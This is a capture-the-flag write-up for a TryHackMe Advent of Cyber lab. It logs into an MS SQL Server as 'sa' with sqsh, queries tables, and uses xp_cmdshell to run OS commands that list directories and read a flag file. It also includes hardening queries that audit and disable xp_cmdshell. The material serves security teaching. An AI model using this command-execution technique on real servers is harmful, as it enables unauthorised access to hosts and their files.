McDatabaseAdmin came rushing into the room and cried to McSkidy, “We’ve been locked out of the reindeer schedule – how will Santa’s transportation work for Christmas?” The Grinch has locked McDatabaseAdmin out of his system. You need to probe the external surface of the server to see if you can get him his access back.

MS SQL Server is a Relational Database Management System (RDBMS). One simple way to think of a relational database is as a group of tables that are related to one another.

This write-up covers interacting with, and recovering access to, a Microsoft SQL Server database using the sqsh database shell. It is part of TryHackMe Advent of Cyber 3, Day 11.

Getting Connected

First things first, I need to figure out which port the database is running on. A quick Nmap scan will sort that out. Once I have the port, I use a command-line tool called sqsh (which I like to call “squish”) to connect to the database. I just need to provide the server’s IP address, the username, and the password. A successful connection drops me into an interactive shell, ready for my commands.

Exploring the Database

The challenge tells me the database is named “reindeer” and it contains three tables: names, presents, and schedule. My goal is to pull information from each of these.

Using standard SQL commands, similar to what you’d use in MySQL, I start querying the tables.

  • From the names table, I pull all the records and find the first name of the reindeer with an ID of 9, which is “Rudolph.”
  • In the schedule table, I look for the destination of a trip scheduled for December 7th and find that it’s “Break.”
  • Finally, in the presents table, I check the quantity of “power bank” presents and find there are 25,000 of them.

Running System Commands and Finding the Flag

Here’s where it gets really fun. Microsoft SQL Server has a powerful, and often dangerous, feature called xp_cmdshell. This allows me to run commands directly on the underlying operating system.

I start by running whoami to see what user account the database is running under. Then, the final task is to find a flag hidden in the “grinch” user’s home directory. I use dir to list the contents of the user’s folders and type to read the contents of files. After a little digging, I find the flag in the Documents folder. 🚩

Technical Commands

Here are the commands I used in my terminal to navigate the database and find the flag:

  • Connecting with sqsh:

```bash
sqsh -S 10.10.179.159 -U sa -P <password>
```

  • SQL queries (in sqsh, GO is the batch terminator and must be sent on its own line):

```sql
SELECT * FROM reindeer.dbo.names;
GO
SELECT * FROM reindeer.dbo.schedule;
GO
SELECT * FROM reindeer.dbo.presents;
GO
```

  • Using xp_cmdshell:

```sql
xp_cmdshell 'whoami';
GO
xp_cmdshell 'dir C:\Users\grinch';
GO
xp_cmdshell 'dir C:\Users\grinch\Documents';
GO
xp_cmdshell 'type C:\Users\grinch\Documents\flag.txt';
GO
```

TryHackMe Advent Of Cyber Challenge Answers

There is an open port related to MS SQL Server accessible over the network. What is the port number?

Knowing the MS SQL Server is running and accessible over the network, we want to check if our username and password are still valid. Using the AttackBox terminal, we will use the command sqsh (pronounced skwish), an interactive database shell.

A simple syntax would be sqsh -S server -U username -P password, where:

  • -S server is used to specify the server, for example -S MACHINE_IP
  • -U username is used to provide the username; for example, -U sa is the username that we have enabled.
  • -P password lets us specify the password.

Let’s try to run sqsh -S MACHINE_IP -U sa -P t7uLKzddQzVjVFJp

If the connection is successful, you will get a prompt. What is the prompt that you have received?

McDatabaseAdmin told us the database name is reindeer and it has three tables:

  1. names
  2. presents
  3. schedule

To display the rows of a table, you could use the following syntax: SELECT * FROM table_name WHERE condition.

  • SELECT * is used to return specific columns (attributes). * refers to all the columns.
  • FROM table_name to specify the table you want to read from.
  • WHERE condition to specify the rows (entities).
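As an added example (not part of the original walkthrough), here is the same SELECT / FROM / WHERE syntax applied to the challenge’s own tables, so that each answer comes back as a single row instead of a full table dump. The columns of names (id, first, last, nickname) are the ones the text lists; the column names used for schedule and presents (trip_date, destination, name, quantity) are assumptions, and the sys.columns query shows how to look up the real ones before guessing.

```sql
-- Added example: targeted queries against the challenge's reindeer database.
-- Run from sqsh; GO on its own line sends the batch to the server.
USE reindeer;
GO

-- names has the columns id, first, last, nickname (as described in the text).
-- [first] is bracketed only so it cannot be mistaken for a keyword.
-- Returns just the first name of reindeer 9.
SELECT [first]
FROM dbo.names
WHERE id = 9;
GO

-- Before assuming column names for the other tables, list them from the
-- catalog views. Swap in dbo.presents to see that table's columns.
SELECT c.name AS column_name, t.name AS data_type
FROM sys.columns AS c
JOIN sys.types AS t ON c.user_type_id = t.user_type_id
WHERE c.object_id = OBJECT_ID('dbo.schedule');
GO

-- ASSUMED column names below (trip_date, destination); adjust to the
-- names the catalog query returned.
SELECT destination
FROM dbo.schedule
WHERE trip_date = '2021-12-07';
GO

-- ASSUMED column names below (name, quantity).
SELECT quantity
FROM dbo.presents
WHERE name = 'Power Bank';
GO
```

Narrowing each query with a WHERE clause also matters outside a CTF: pulling whole tables over the wire is noisy in the server’s logs and slow on real data, while a keyed lookup returns exactly the row you were asked about.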

We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?

Check the table schedule. What is the destination of the trip scheduled on December 7?

Check the table presents. What is the quantity available for the present “Power Bank”?

Now, let’s see if we can run MS Windows commands while interacting with the database. Some MS SQL Servers have xp_cmdshell enabled. If this is the case, we might have access to something similar to a command prompt.

The command syntax is xp_cmdshell 'COMMAND';. Let’s try a simple command, whoami, which shows the user running the commands. In the terminal output below, after connecting to MS SQL Server, we tried xp_cmdshell 'whoami';, and we can see that the user is nt service\mssqlserver. This means that any command we pass to xp_cmdshell will run as nt service\mssqlserver.
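From the defender’s side, the questions are whether xp_cmdshell is enabled at all, which OS account it would run as, and which logins could use it. The T-SQL below is an added example, not part of the original walkthrough; it uses only documented system views and procedures (sys.configurations, sys.dm_server_services, sys.server_principals, sp_configure) and assumes a sysadmin login on the instance, which the challenge’s sa login is.

```sql
-- Added example: audit and harden xp_cmdshell on an MS SQL Server instance.
-- Requires a sysadmin login (the walkthrough's sa login qualifies).

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
GO

-- 2. Which OS account would commands run as? The walkthrough saw
--    nt service\mssqlserver, a per-service virtual account with limited
--    rights on the host. A domain admin or LocalSystem here is a finding.
SELECT servicename, service_account
FROM sys.dm_server_services;
GO

-- 3. Who holds sysadmin? Each of these logins can run xp_cmdshell and can
--    also re-enable it, so the list should be short and 'sa' should be
--    disabled or protected by a strong, unique password.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1;
GO

-- 4. Turn xp_cmdshell off. 'show advanced options' must be on to change it,
--    and is switched back off afterwards.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
GO

-- 5. Confirm the change took effect (value_in_use should now be 0).
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
GO
```

Disabling the procedure is a speed bump rather than a wall, because any sysadmin login can flip it back on with the same sp_configure call. The durable controls are the ones this room illustrates by their absence: a SQL Server listener that is not reachable from untrusted networks, an sa login that is disabled or has a strong unique password, and logging of configuration changes so a re-enable is noticed.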

There is a flag hidden in the grinch user’s home directory. What are its contents?

Video Walk-Through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
